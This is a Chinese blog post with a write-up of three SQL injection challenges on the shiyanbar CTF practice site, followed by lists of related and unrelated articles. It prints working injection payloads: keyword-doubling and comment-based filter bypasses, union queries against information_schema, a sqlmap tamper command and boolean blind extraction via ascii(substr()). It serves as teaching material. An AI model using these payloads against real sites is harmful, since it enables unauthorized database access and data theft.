实验吧的三道sql注入(感觉实验吧大部分web都是注入)

简单的SQL注入

地址:http://ctf5.shiyanbar.com/423/web/

这道题也是sql注入,输入1,页面显示正常,输出1',页面报错

还是走流程把  fuzz下

发现过滤了and union之类的。不过尝试后发现是可以构造双写关键词 uniunionion

下面尝试爆表名和字段,发现他过滤了很多关键字:and,select,from,union,where,这里绕过关键字的方法有:关键字中间加/**/隔断,/*!关键字*/,关键字中间加%0b隔断,关键字重写(关关键字键字),大小写混合等等,尝试后/*!*/可以绕过,

查看数据库:

http:'  unionunion  selectselect  database()'

2.查询数据库中的表

http:

查询字段名

' unionunion  selectselect  column_namcolumn_namee  fromfrom  information_schema.coluinformation_schema.columnsmns  wherewhere  table_name='flag







简单的SQL注入2


地址:http://ctf5.shiyanbar.com/web/index_2.php


还是简单手工测试 输入1 不报错 1' 报错  尝试1' or '1'='1 报错




尝试后 发现过滤了空格




http:






后面发现union和select、#都没过滤 就很简单了


查看数据库




http:'/**/union/**/select/**/database()/**/%23






查看表 发现flag表




http:'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/%23






后面就不贴了 这个也可以直接sqlmap跑




sqlmap.py  --tamper=space2comment --dbs 






简单的SQL注入3


地址:http://ctf5.shiyanbar.com/web/index_3.php


输入1,页面显示hello,输入1',页面报错


 


网上说直接sqlmap可以出来 我试了不行 还是手工吧


正确和错误返回的页面不一样 布尔盲注


fuzz一下 发现sleep()应该是过滤了  那么这里需要替换函数




这里既然是布尔盲注可以跑盲注脚本 一个字符一个的试 看了wp 发现还有更好的办法




http:' and (select count(*) from xxx.bb)>0 %23




这里会爆错 得到我们的数据库名




由此我们得知数据库名为web1,


接下里跑表的语句还是




?id' and (select count(*) from 表名)>0 %23




只能简单的拿?id=1' and (select count(*) from flag)>0 %23测试一下,返回了hello说明flag表存在


猜列的手法如出一辙


?id=1'union select 列名 from flag %23可以拿个字段字典放burp里跑,我这里还是进行简单的测试


?id=1'union select flag from flag %23后返回了hello,说明存在flag列


接下来就是最重要的一步——猜字符




?id'and ascii(substr((select flag from flag),1,1))=ASCII%23




对ASCII码进行爆破,值从30到127


猜解得flag
												


											
实验吧之【简单的sql注入 1、2、3】的更多相关文章
	

    
						
  1. 实验吧_简单的sql注入_1、2、3
		
    简单的sql注入1 看着这个简单的界面,一时间没有特别好的思路,先输入一个1',发生了报错 初步猜测这是一个字符型的注入,他将我们输入的语句直接当成sql语句执行了,按题目的意思后面肯定过滤了很多注入 ...
    
		
    2. 
						
  2. 【实验吧】CTF_Web_简单的SQL注入之3
		
    实验吧第二题 who are you? 很有意思,过两天好好分析写一下.简单的SQL注入之3也很有意思,适合做手工练习,详细分析见下. http://ctf5.shiyanbar.com/web/in ...
    
		
    3. 
								
  3. 实验吧简单的SQL注入1,简单的SQL注入
		
    接上面一篇博客. 实验吧简单的sql注入1 题目连接   http://ctf5.shiyanbar.com/423/web/ 同样,直接输入 1加个但引号,结果下面有返回错误,            ...
    
		
    4. 
						
  4. 实验吧简单的sql注入3
		
    今天早上起来发现有人评论说我没更新实验吧sql注入3,主要是因为前段时间都去做bugku去了 但是重做这道题发现以前的姿势不行了,exp()报错不再溢出,现在不能用这个姿势,所以这里重新整理了一遍思路 ...
    
		
    5. 
						
  5. 【实验吧】CTF_Web_简单的SQL注入之1
		
    题目链接:http://ctf5.shiyanbar.com/423/web/ 简单的SQL注入之1,比2,3都简单一些.利用2 的查询语句也可以实现:1'/**/union/**/select/** ...
    
		
    6. 
						
  6. 简单的SQL注入学习
		
    引贴: http://blog.163.com/lucia_gagaga/blog/static/26476801920168184648754/ 首先需要编写一个php页面,讲php页面放入/opt ...
    
		
    7. 
						
  7. union注入的几道ctf题,实验吧简单的sql注入1,2,这个看起来有点简单和bugku的成绩单
		
    这几天在做CTF当中遇到了几次sql注入都是union,写篇博客记录学习一下. 首先推荐一篇文章“https://blog.csdn.net/Litbai_zhang/article/details/ ...
    
		
    8. 
						
  8. 实验吧—Web——WP之 简单的sql注入之2
		
    直接打开解题连接: 既然是SQL注入,那么我们就要构造注入语句了,这个就要有耐心一个一个去尝试了 输入语句 1'and 1=1 # 和 1'and/**/1=1/**/#后 对比一下,发现是过滤掉了空 ...
    
		
    9. 
						
  9. 一道简单的SQL注入题
		
    这是我真正意义上来说做的第一道SQL题目,感觉从这个题目里还是能学到好多东西的,这里记录一下这个题目的writeup和在其中学到的东西 link:https://www.ichunqiu.com/ba ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. 【干货推荐】Android开发该学习哪些东西?
			
    开篇: 本人也是众多Android开发道路上行走的一员,听了不少大神的知乎live,自己也看了不少书,也和不少前辈交流过,所以在这里分享一下Android开发应该学习的书籍以及知识,当然,也包括一些方 ...
    
			
    2. 
						
  2. 正确应用Java数组
			
    一.数组的特点 数组与其他容器的区别有三方面:效率.类型和保存基本类型的能力. 1.效率.数组是一种效率最高的存储和随机访问对象引用序列的方式.数组是一段连续地址空间内的线性序列,所以访问非常快.但也 ...
    
			
    3. 
						
  3. Mysql两种引擎
			
    Innodb引擎 Innodb引擎提供了对数据库ACID事务的支持,并且实现了SQL标准的四种隔离级别.该引擎还提供了行级锁和外键约束,它的设计目标是处理大容量数据库系统,它本身其实就是基于MySQL ...
    
			
    4. 
						
  4. 重学js之JavaScript 面向对象的程序设计(创建对象)
			
    注意: 本文章为 <重学js之JavaScript高级程序设计>系列第五章[JavaScript引用类型]. 关于<重学js之JavaScript高级程序设计>是重新回顾js基 ...
    
			
    5. 
						
  5. jsp作用域总结
			
    我们在定义每一个变量,每一个属性的时候,都会考虑这个变量.属性的作用范围,也就是作用域. JSP的四大作用域 作用域对象 作用域范围 page 只在当前页面有效 request 一次请求的生命周期内有 ...
    
			
    6. 
						
  6. 新手学习FFmpeg - 调用API完成两个视频的任意合并
			
    本次尝试在视频A中的任意位置插入视频B. 在上一篇中,我们通过调整PTS可以实现视频的加减速.这只是对同一个视频的调转,本次我们尝试对多个视频进行合并处理. Concat如何运行 ffmpeg提供了一 ...
    
			
    7. 
						
  7. 前端利器躬行记(6)——Fiddler
			
    Fiddler是一款免费的.基于Windows系统的代理服务器软件(即Web调试抓包工具),由Eric Lawrence用C#语言在2003年10月发布了第一个版本.注意,由于Fiddler依赖Mic ...
    
			
    8. 
						
  8. 《Maven实战》读书笔记
			
    一.Maven使用入门 POM(Project Object Model,项目对象模型),定义了项目的基本信息,用于描述项目如何构建,声明项目依赖等等 二.坐标和依赖 1.何为Maven坐标 Mave ...
    
			
    9. 
						
  9. Spring Boot (五): Redis缓存使用姿势盘点
			
    1. Redis 简介 Redis 是目前业界使用最广泛的内存数据存储.相比 Memcached,Redis 支持更丰富的数据结构,例如 hashes, lists, sets 等,同时支持数据持久化 ...
    
			
    10. 
						
  10. java.nio.ByteBuffer中的flip()、rewind()、compact()等方法的使用和区别
			
    java.nio.ByteBuffer 1. ByteBuffer中的参数position.limit.capacity.mark含义: position:表示当前指针的位置(下一个要操作的数据元素的 ...
    
			
    11.